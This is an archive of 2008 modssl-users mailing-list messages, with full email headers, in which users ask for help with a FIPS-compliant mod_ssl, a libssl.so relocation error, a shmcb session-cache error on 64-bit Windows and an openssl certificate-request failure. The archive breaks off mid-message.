Message-ID: <48828989.4090203@boulder.nist.gov>
Date: Sat, 19 Jul 2008 18:40:41 -0600
From: Sean Coleman 
User-Agent: Thunderbird 2.0.0.12 (X11/20080226)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Fips compliant mod_ssl module availability
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-NIST-MailScanner: Found to be clean
X-NIST-MailScanner-From: coleman@boulder.nist.gov
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean Coleman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I need to implement a FIPS 140 compliant version of mod_ssl. Is there a 
patch file or a distribution of mod_ssl
currently available for download which can be used in conjunction with 
the fips compliant libopenssl?

I found a link to a patch file for modssl in a message sent earlier in 
2008 but the link doesn't work. The link was
found in this thread: 
http://www.mail-archive.com/openssl-users@openssl.org/msg52290.html The 
actual link
posted was 
http://mail-archives.apache.org/mod_mbox/httpd-bugs/200711.mbox/[EMAIL 
PROTECTED]/bugzilla/%3e

Has this patch been obsoleted?

I also found an entire distribution tree for a FIPS compliant httpd 
server at
http://svn.apache.org/repos/asf/httpd/sandbox/gaithersburg. What is the 
status of this code? Is this code
available somewhere for download to be used to provide a FIPS compliant 
mod_ssl module?

Thank you,

Sean Coleman


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 06:58:34 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 20A5814D9EC; Thu, 21 Aug 2008 06:58:34 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from n6b.bullet.mail.ac4.yahoo.com (n6b.bullet.mail.ac4.yahoo.com [76.13.13.76])
	by master.modssl.org (Postfix) with SMTP id 785A214D82E
	for ; Thu, 21 Aug 2008 06:58:33 +0200 (CEST)
Received: from [76.13.13.25] by n6.bullet.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 04:57:31 -0000
Received: from [76.13.10.179] by t4.bullet.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 04:57:31 -0000
Received: from [127.0.0.1] by omp120.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 04:57:31 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 955663.66187.bm@omp120.mail.ac4.yahoo.com
Received: (qmail 94366 invoked by uid 60001); 21 Aug 2008 04:57:31 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:Message-ID;
  b=u4Wksk6EBJXK987uuVgLhpymcCqi7H/xr2mCRQGBIod+c3J94X7pkvY5md9irwR5duUPzzqF1ua5W57lFn6oE7mQArcKD2xAQPcovGLwonyk1l9dgsjInrngxZzi5hShisp3x2yhhpFgdiif8PAESlsa5xhN9AYokMKKdhY0bvw=;
X-YMail-OSG: 9y.px9QVM1lzeuJvMnkmkqhya_bvJGt.3pTGkbIDs0gjFSZrpyToeyMiWdNjtQcCUt.Yrtzj8KwOV.RAAHUd7dx10YEwA1Zr2zbB.ok1FB1DMbXaVePy7WO7f_jko9k-
Received: from [128.107.248.220] by web59503.mail.ac4.yahoo.com via HTTP; Wed, 20 Aug 2008 21:57:31 PDT
X-Mailer: YahooMailRC/1042.48 YahooMailWebService/0.7.218.2
Date: Wed, 20 Aug 2008 21:57:31 -0700 (PDT)
From: Linda Lee 
Subject: Cannot load /export/home/httpd/libexec/libssl.so into server: ld.so.1:
To: modssl-users@modssl.org
Message-ID: <869184.94206.qm@web59503.mail.ac4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Linda Lee 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1715676727-1219294651=:94206"

--0-1715676727-1219294651=:94206
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

=0A=0A=0A=0AHi all=0A=A0=0A*I am using apache 1.3.41 with mod_ssl 2.8.31.=
=A0 I kept getting the below error:=0A=A0=0AStarting httpd: httpd Syntax er=
ror on line 249 of /export/home/httpd/conf/httpd.conf:=0ACannot load /expor=
t/home/httpd/libexec/libssl.so into server: ld.so.1: httpd: fatal: relocati=
on error: file /export/home/httpd/libexec/libssl.so: symbol inflateEnd: ref=
erenced symbol not found=0AFAILED=0A=A0=0A*In my httpd.conf, line 249 is:=
=A0 =0ALoadModule ssl_module=A0=A0=A0=A0=A0=A0=A0=A0 libexec/libssl.so=0A=
=A0=0A*libssl.so's loation is correct.=A0 It is=A0in /export/home/httpd/lib=
exec/.=0A=A0=0AThanks for your help=0A=0A=0A      
--0-1715676727-1219294651=:94206
Content-Type: text/html; charset=us-ascii












Hi all


 


*I am using apache 1.3.41 with mod_ssl 2.8.31.  I kept getting the below error:


 


Starting httpd: httpd Syntax error on line 249 of /export/home/httpd/conf/httpd.conf:
Cannot load /export/home/httpd/libexec/libssl.so into server: ld.so.1: httpd: fatal: relocation error: file /export/home/httpd/libexec/libssl.so: symbol inflateEnd: referenced symbol not found
FAILED


 


*In my httpd.conf, line 249 is:  


LoadModule ssl_module         libexec/libssl.so


 


*libssl.so's loation is correct.  It is in /export/home/httpd/libexec/.


 


Thanks for your help


 




 




      
--0-1715676727-1219294651=:94206--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 07:03:56 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8EA0714D9EC; Thu, 21 Aug 2008 07:03:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from n4b.bullet.mail.ac4.yahoo.com (n4b.bullet.mail.ac4.yahoo.com [76.13.13.74])
	by master.modssl.org (Postfix) with SMTP id 9F80014D82E
	for ; Thu, 21 Aug 2008 07:03:54 +0200 (CEST)
Received: from [76.13.13.25] by n4.bullet.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 05:02:52 -0000
Received: from [76.13.10.177] by t4.bullet.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 05:02:52 -0000
Received: from [127.0.0.1] by omp118.mail.ac4.yahoo.com with NNFMP; 21 Aug 2008 05:02:52 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 955627.18965.bm@omp118.mail.ac4.yahoo.com
Received: (qmail 92132 invoked by uid 60001); 21 Aug 2008 05:02:52 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Message-ID;
  b=lxY0kfNTYVjQniHDyiIR3BkrTGDvMkC/r1XDVm3DKjRyCdWsWMqlT7vuIPSx6VzK3aS0JQ5iRLnzu2qL+sssOfYdWdDMvvEWF57ZGiZr37ZENbH4UWqgPIGHQbrhFfxZhD7h9KHMm05gwrBmg4NcggLTxUvC1CPGtQmmgSh6wK0=;
X-YMail-OSG: KW5QCkcVM1nHCOw0apX98j_mzoE1vzVMX89xEWMKAYHMvpF503nVIB.rBhiyw2bBAGI83o1RivHisvn2FHmzTZgFaUS63qy54DtBdLQC.GJFI7hOCgzcF3DjNlxtE8U-
Received: from [128.107.248.220] by web59504.mail.ac4.yahoo.com via HTTP; Wed, 20 Aug 2008 22:02:52 PDT
X-Mailer: YahooMailRC/1042.48 YahooMailWebService/0.7.218.2
Date: Wed, 20 Aug 2008 22:02:52 -0700 (PDT)
From: Linda Lee 
Subject: Cannot load libssl.so into server: ld.so.1: httpd: fatal: relocation error:
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-288902872-1219294972=:91109"
Message-ID: <865692.91109.qm@web59504.mail.ac4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Linda Lee 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-288902872-1219294972=:91109
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

Hi all=0A=A0=0A*I am using apache 1.3.41 with mod_ssl 2.8.31.=A0 I kept get=
ting the below error:=0A=A0=0AStarting httpd: httpd Syntax error on line 24=
9 of /export/home/httpd/conf/httpd.conf:=0ACannot load /export/home/httpd/l=
ibexec/libssl.so into server: ld.so.1: httpd: fatal: relocation error: file=
 /export/home/httpd/libexec/libssl.so: symbol inflateEnd: referenced symbol=
 not found=0AFAILED=0A=A0=0A*In my httpd.conf, line 249 is:=A0 =0ALoadModul=
e ssl_module=A0=A0=A0=A0=A0=A0=A0=A0 libexec/libssl.so=0A=A0=0A*libssl.so's=
 loation is correct.=A0 It is=A0in /export/home/httpd/libexec/.=0A=A0=0ATha=
nks for your help=0A=0A=0A      
--0-288902872-1219294972=:91109
Content-Type: text/html; charset=us-ascii




Hi all


 


*I am using apache 1.3.41 with mod_ssl 2.8.31.  I kept getting the below error:


 


Starting httpd: httpd Syntax error on line 249 of /export/home/httpd/conf/httpd.conf:
Cannot load /export/home/httpd/libexec/libssl.so into server: ld.so.1: httpd: fatal: relocation error: file /export/home/httpd/libexec/libssl.so: symbol inflateEnd: referenced symbol not found
FAILED


 


*In my httpd.conf, line 249 is:  


LoadModule ssl_module         libexec/libssl.so


 


*libssl.so's loation is correct.  It is in /export/home/httpd/libexec/.


 


Thanks for your help



      
--0-288902872-1219294972=:91109--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 15:30:49 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C17BA14DA31; Thu, 21 Aug 2008 15:30:49 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from rv-out-0506.google.com (rv-out-0506.google.com [209.85.198.237])
	by master.modssl.org (Postfix) with ESMTP id 7E77714D82E
	for ; Thu, 21 Aug 2008 15:30:48 +0200 (CEST)
Received: by rv-out-0506.google.com with SMTP id k40so940269rvb.1
        for ; Thu, 21 Aug 2008 06:29:46 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:in-reply-to:mime-version:content-type:references;
        bh=suViNqyy98t+1oXMOVvu3SabNWbIHMHOYlVTpMHd1qc=;
        b=la080xXA+vGHMgVE6pS13+yUi+Dw4Ly9qIQOtYBeZ27Gl1atIpKPuXbiFQx7LmxHB6
         cEz4Gxxsj1OwjDs43+lFQy2ZTG+xMOU/VXjE0imuQPGflqyIP8iyAm3WwYq4DLVHYWLe
         /gx9RyNs1OAUGfXxi7bGU2jOXJBHi2jX+wbuo=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version
         :content-type:references;
        b=JGE+tc7EgTXlZD9TQF/Llkd0eXgIz070+XK3QHfST0FIfHGhRPoxI6SXOJrLTPRwd4
         SEK7ixCBhjonEsliil0pW1fRbMw9FFSNdSDYpbcyQWrWAl9EHTecuyhItyQF4tNmm59y
         6x7xuz1pgL+9SYTCDZJj/K5wYwRQP7dhJYbZE=
Received: by 10.140.202.21 with SMTP id z21mr711663rvf.81.1219325386011;
        Thu, 21 Aug 2008 06:29:46 -0700 (PDT)
Received: by 10.141.42.16 with HTTP; Thu, 21 Aug 2008 06:29:45 -0700 (PDT)
Message-ID: 
Date: Thu, 21 Aug 2008 09:29:45 -0400
From: "Xian Xian" 
To: modssl-users@modssl.org
Subject: Re: Cannot load libssl.so into server: ld.so.1: httpd: fatal: relocation error:
In-Reply-To: <865692.91109.qm@web59504.mail.ac4.yahoo.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_37641_24583903.1219325386002"
References: <865692.91109.qm@web59504.mail.ac4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xian Xian" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_37641_24583903.1219325386002
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You did not configure your Apache with mod_ssl when you set it up. You need
to rebuild your Apache.

On Thu, Aug 21, 2008 at 1:02 AM, Linda Lee  wrote:

> Hi all
>
> *I am using apache 1.3.41 with mod_ssl 2.8.31.  I kept getting the below
> error:
>
> Starting httpd: httpd Syntax error on line 249 of
> /export/home/httpd/conf/httpd.conf:
> Cannot load /export/home/httpd/libexec/libssl.so into server: ld.so.1:
> httpd: fatal: relocation error: file /export/home/httpd/libexec/libssl.so:
> symbol inflateEnd: referenced symbol not found
> FAILED
>
> *In my httpd.conf, line 249 is:
> LoadModule ssl_module         libexec/libssl.so
>
> *libssl.so's loation is correct.  It is in /export/home/httpd/libexec/.
>
> Thanks for your help
>
>

------=_Part_37641_24583903.1219325386002
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


You did not configure your Apache with mod_ssl when you set it up. You need to rebuild your Apache.

On Thu, Aug 21, 2008 at 1:02 AM, Linda Lee <n2kcn29@yahoo.com> wrote:




Hi all


 


*I am using apache 1.3.41 with mod_ssl 2.8.31.  I kept getting the below error:



 


Starting httpd: httpd Syntax error on line 249 of /export/home/httpd/conf/httpd.conf:
Cannot load /export/home/httpd/libexec/libssl.so into server: ld.so.1: httpd: fatal: relocation error: file /export/home/httpd/libexec/libssl.so: symbol inflateEnd: referenced symbol not found

FAILED


 


*In my httpd.conf, line 249 is:  


LoadModule ssl_module         libexec/libssl.so


 


*libssl.so's loation is correct.  It is in /export/home/httpd/libexec/.


 


Thanks for your help



      



------=_Part_37641_24583903.1219325386002--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 11:42:49 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9E90C14DA3B; Mon,  1 Sep 2008 11:42:49 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtpauth01.mweb.co.za (smtpauth01.mweb.co.za [196.2.53.147])
	by master.modssl.org (Postfix) with ESMTP id 38EFD14D838
	for ; Mon,  1 Sep 2008 11:42:48 +0200 (CEST)
Received: from smtpauth01.mweb.co.za (localhost.localdomain [127.0.0.1])
	by smtpfilter.mweb.co.za (Postfix) with ESMTP id E2B06A005E
	for ; Mon,  1 Sep 2008 11:41:44 +0200 (SAST)
Received: by smtpauth01.mweb.co.za (Postfix, from userid 509)
	id D1BCDA006D; Mon,  1 Sep 2008 11:41:44 +0200 (SAST)
X-Spam-Checker-Version: SpamAssassin 3.1.5 (2006-08-29) on 
	smtpauth01.mweb.co.za
X-Spam-Level: 
X-Spam-Status: No, hits=0.6 required=12.0 tests=HELO_IS_SMALL6,TW_HM autolearn=no version=3.1.5, dccd=, rbl= [127.0.0.7]
	 [196.41.129.88]
	 [10 mx-home1.worldonline.co.za.]
X-Spam-Report: 
	*  0.6 HELO_IS_SMALL6 HELO_IS_SMALL6
	*  0.1 TW_HM BODY: Odd Letter Triples with HM
Received: from johanh (unknown [196.26.23.213])
	by smtpauth01.mweb.co.za (Postfix) with ESMTP id EA268A005E
	for ; Mon,  1 Sep 2008 11:41:41 +0200 (SAST)
From: "Johan Hoogenboezem" 
To: 
Subject: Error when trying shmcb SSLSessionCache on 64-bit Windows
Date: Mon, 1 Sep 2008 11:41:48 +0200
Message-ID: <0B276B709F9D475F98D2519D436A166E@johanh>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Thread-Index: AckMFvQLbpi2oO4uSCmv4D5xktmVeQ==
X-Virus-Scanned: ClamAV using ClamSMTP
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johan Hoogenboezem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All
I'm running Apache 2.2.9 on Windows Server 2003 (64-bit version) in a
production environment with mod_ssl configured. The only type of
SSLSessionCache I am able to use is dbm. If I try the memory-based cache
(shmcb, shmht or just shm), I get this error:

Syntax error on line 62 of C:/Program Files (x86)/Apache Software
Foundation/Apache2.2/conf/extra/httpd-ssl.conf:
SSLSessionCache: Invalid argument: size has to be >= 8192 bytes

Their is nothing wrong with the way the argument is set. This is what the
line looks like:

SSLSessionCache        "shmcb:C:/Program Files (x86)/Apache Software
Foundation/Apache2.2/logs/ssl_scache(512000)"

I tried different argument values to no avail.

I realize their is no official version of httpd for 64-bit Windows. I found
an unofficial one, but that one doesn't work at all. It appears to have
other issues. Besides, I'd rather use a production-ready, offical version
even if it is 32-bit. 

Any comments will be greatly appreciated

Regards

Johan Hoogenboezem


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 13:11:00 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B2FF114DA3B; Mon,  1 Sep 2008 13:11:00 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtpauth02.mweb.co.za (smtpauth02.mweb.co.za [196.2.53.148])
	by master.modssl.org (Postfix) with ESMTP id EC7A614D838
	for ; Mon,  1 Sep 2008 13:10:59 +0200 (CEST)
Received: from smtpauth02.mweb.co.za (smtpauth02.mweb.co.za [127.0.0.1])
	by smtpfilter.mweb.co.za (Postfix) with ESMTP id 93DE8BF2068;
	Mon,  1 Sep 2008 13:09:46 +0200 (SAST)
Received: by smtpauth02.mweb.co.za (Postfix, from userid 508)
	id 82B5BBF20E7; Mon,  1 Sep 2008 13:09:46 +0200 (SAST)
X-Spam-Checker-Version: SpamAssassin 3.1.5 (2006-08-29) on 
	smtpauth02.mweb.co.za
X-Spam-Level: 
X-Spam-Status: No, hits=0.6 required=12.0 tests=HELO_IS_SMALL6 autolearn=no version=3.1.5, dccd=, rbl= [127.0.0.7]
	 [196.41.129.88]
	 [10 mx-home1.worldonline.co.za.]
X-Spam-Report: 
	*  0.6 HELO_IS_SMALL6 HELO_IS_SMALL6
Received: from johanh (unknown [196.26.23.213])
	by smtpauth02.mweb.co.za (Postfix) with ESMTP id 515B4BF2068;
	Mon,  1 Sep 2008 13:09:43 +0200 (SAST)
From: "Johan Hoogenboezem" 
To: 
Cc: 
References: <0B276B709F9D475F98D2519D436A166E@johanh> <48CA15196B034666BE2A04C659132C04@woburn.com>
Subject: RE: Error when trying shmcb SSLSessionCache on 64-bit Windows
Date: Mon, 1 Sep 2008 13:09:58 +0200
Message-ID: <7CCB9574AA934A67B46050D8242E70DE@johanh>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Thread-Index: AckMIKmPFah/qfY2Twm+92OyLEQSVAAAUUkw
In-Reply-To: <48CA15196B034666BE2A04C659132C04@woburn.com>
X-Virus-Scanned: ClamAV using ClamSMTP
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johan Hoogenboezem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Martin
1) I'm still reluctant to use an unofficial build, but its good to know
others are using it.
2) Wow, well spotted with your "(x86)" theory! It also failed with a
relative path: logs/ssl_scache(512000), but depending on how the relative
path is being translated to an absolute path behind the scenes, you might
still be right... I'll try it out as soon as I can and let you know.
Thanks a lot
Johan

-----Original Message-----
From: Martin Dickau [mailto:mdickau@byallaccounts.com] 
Sent: 01 September 2008 12:18 PM
To: hoogenbj@worldonline.co.za
Subject: Re: Error when trying shmcb SSLSessionCache on 64-bit Windows

I am using an unofficial 2.2.9 native on Windows Server 2003 64-bit 
(AMD64/EM64T) from http://www.blackdot.be/?inc=apache/binaries and am using 
shmcb without any trouble.  You do need to install the VC++ 2005 64-bit 
redistributable runtime.  I am also using the mod_jk build from that site, 
but I could not get the mod_log_rotate to run without crashing and had to 
build that one myself.

That said, the "invalid size" error and the fact that size is passed in 
parentheses as "(512000)" makes me wonder if it is reading the "(x86)" from 
the path as the size.  Have you tried using C:/PROGRA~1/ (or PROGRA~2 --  
whichever it is on your system) instead?

Regards,

Martin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  2 07:04:17 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8252F14DA30; Tue,  2 Sep 2008 07:04:17 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtpauth02.mweb.co.za (smtpauth02.mweb.co.za [196.2.53.148])
	by master.modssl.org (Postfix) with ESMTP id 6E77A14D884
	for ; Tue,  2 Sep 2008 07:04:14 +0200 (CEST)
Received: from smtpauth02.mweb.co.za (smtpauth02.mweb.co.za [127.0.0.1])
	by smtpfilter.mweb.co.za (Postfix) with ESMTP id D908EBF2069;
	Tue,  2 Sep 2008 07:03:05 +0200 (SAST)
Received: by smtpauth02.mweb.co.za (Postfix, from userid 508)
	id C7050BF2072; Tue,  2 Sep 2008 07:03:05 +0200 (SAST)
X-Spam-Checker-Version: SpamAssassin 3.1.5 (2006-08-29) on 
	smtpauth02.mweb.co.za
X-Spam-Level: 
X-Spam-Status: No, hits=0.6 required=12.0 tests=HELO_IS_SMALL6 autolearn=no version=3.1.5, dccd=, rbl= [127.0.0.7]
	 [196.41.129.88]
	 [10 mx-home1.worldonline.co.za.]
X-Spam-Report: 
	*  0.6 HELO_IS_SMALL6 HELO_IS_SMALL6
Received: from johanh (unknown [196.26.23.213])
	by smtpauth02.mweb.co.za (Postfix) with ESMTP id 6BCEFBF2069;
	Tue,  2 Sep 2008 07:03:03 +0200 (SAST)
From: "Johan Hoogenboezem" 
To: 
Cc: 
References: <0B276B709F9D475F98D2519D436A166E@johanh> <48CA15196B034666BE2A04C659132C04@woburn.com> <7CCB9574AA934A67B46050D8242E70DE@johanh>
Subject: RE: Error when trying shmcb SSLSessionCache on 64-bit Windows
Date: Tue, 2 Sep 2008 07:03:10 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
Thread-Index: AckMIKmPFah/qfY2Twm+92OyLEQSVAAAUUkwACXJn8A=
In-Reply-To: <7CCB9574AA934A67B46050D8242E70DE@johanh>
X-Virus-Scanned: ClamAV using ClamSMTP
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johan Hoogenboezem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Martin
I tried the short (8.3) version of the directory with no luck. Ah well...
Thanks
Johan 

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Johan Hoogenboezem
Sent: 01 September 2008 01:10 PM
To: modssl-users@modssl.org
Cc: mdickau@byallaccounts.com
Subject: RE: Error when trying shmcb SSLSessionCache on 64-bit Windows

Hi Martin
1) I'm still reluctant to use an unofficial build, but its good to know
others are using it.
2) Wow, well spotted with your "(x86)" theory! It also failed with a
relative path: logs/ssl_scache(512000), but depending on how the relative
path is being translated to an absolute path behind the scenes, you might
still be right... I'll try it out as soon as I can and let you know.
Thanks a lot
Johan

-----Original Message-----
From: Martin Dickau [mailto:mdickau@byallaccounts.com] 
Sent: 01 September 2008 12:18 PM
To: hoogenbj@worldonline.co.za
Subject: Re: Error when trying shmcb SSLSessionCache on 64-bit Windows

I am using an unofficial 2.2.9 native on Windows Server 2003 64-bit 
(AMD64/EM64T) from http://www.blackdot.be/?inc=apache/binaries and am using 
shmcb without any trouble.  You do need to install the VC++ 2005 64-bit 
redistributable runtime.  I am also using the mod_jk build from that site, 
but I could not get the mod_log_rotate to run without crashing and had to 
build that one myself.

That said, the "invalid size" error and the fact that size is passed in 
parentheses as "(512000)" makes me wonder if it is reading the "(x86)" from 
the path as the size.  Have you tried using C:/PROGRA~1/ (or PROGRA~2 --  
whichever it is on your system) instead?

Regards,

Martin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
No virus found in this incoming message.
Checked by AVG - http://www.avg.com 
Version: 8.0.169 / Virus Database: 270.6.14/1644 - Release Date: 8/31/2008
4:59 PM

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  4 17:28:30 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4B76814D9D6; Thu,  4 Sep 2008 17:28:30 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from blu0-omc3-s23.blu0.hotmail.com (blu0-omc3-s23.blu0.hotmail.com [65.55.116.98])
	by master.modssl.org (Postfix) with ESMTP id E6AA014D83F
	for ; Thu,  4 Sep 2008 17:28:29 +0200 (CEST)
Received: from BLU106-W30 ([65.55.116.74]) by blu0-omc3-s23.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
	 Thu, 4 Sep 2008 08:27:26 -0700
Message-ID: 
Content-Type: multipart/alternative;
	boundary="_570866f9-027b-4173-aa22-95b8226bec4c_"
X-Originating-IP: [99.189.157.17]
From: V H 
To: 
Subject: Some help with ssl
Date: Thu, 4 Sep 2008 11:27:26 -0400
Importance: High
MIME-Version: 1.0
X-OriginalArrivalTime: 04 Sep 2008 15:27:26.0795 (UTC) FILETIME=[BC9211B0:01C90EA2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: V H 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--_570866f9-027b-4173-aa22-95b8226bec4c_
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

I've been trying to secure an apache sever with ssl but I keep the followin=
g error after I enter my attributes - can anyone help. Thanks:
=20
Error adding attribute3556:error:0D0BF041:asn1 encoding routines:ASN1_item_=
dup:malloc failure:.\crypto\asn1\a_dup.c:104: problems making Certificate R=
equest
=20
See the full print out of the command I issued below:
=20
C:\Program Files\Apache Software Foundation\Apache2.2\bin>openssl req -conf=
ig .\openssl.cnf -new -out myserver.csr
Loading 'screen' into random state - doneGenerating a 1024 bit RSA private =
key...........................................++++++.......++++++writing ne=
w private key to 'privkey.pem'Enter PEM pass phrase:Verifying - Enter PEM p=
ass phrase:-----You are about to be asked to enter information that will be=
 incorporatedinto your certificate request.What you are about to enter is w=
hat is called a Distinguished Name or a DN.There are quite a few fields but=
 you can leave some blankFor some fields there will be a default value=2CIf=
 you enter '.'=2C the field will be left blank.-----.
.
.
.
A challenge password []:vj150Error adding attribute3556:error:0D0BF041:asn1=
 encoding routines:ASN1_item_dup:malloc failure:.\crypto\asn1\a_dup.c:104: =
problems making Certificate Request
C:\Program Files\Apache Software Foundation\Apache2.2\bin>
_________________________________________________________________
Want to do more with Windows Live? Learn =9310 hidden secrets=94 from Jamie=
.
http://windowslive.com/connect/post/jamiethomson.spaces.live.com-Blog-cns!5=
50F681DAD532637!5295.entry?ocid=3DTXT_TAGLM_WL_domore_092008=

--_570866f9-027b-4173-aa22-95b8226bec4c_
Content-Type: text/html; charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable





I've been trying to secure an apache sever with s=
sl but I keep the following error after I enter my attributes - can anyone =
help. Thanks:

 =3B

Error adding attribute
3556:error:0D0BF041:asn1 en=
coding routines:ASN1_item_dup:malloc failure:.\crypto
\asn1\a_dup.c:104:=
 problems making Certificate Request

 =3B

See the full print out of the command I issued below:

 =3B

C:\Program Files\Apache Software Foundation\Apache2.2\bin>=3Bopenssl req =
-config .\
openssl.cnf -new -out myserver.csr


Loading 'screen' into random state - done
Generating a 1024 bit RSA =
private key
...........................................++++++
.......=
++++++
writing new private key to 'privkey.pem'
Enter PEM pass phrase=
:
Verifying - Enter PEM pass phrase:
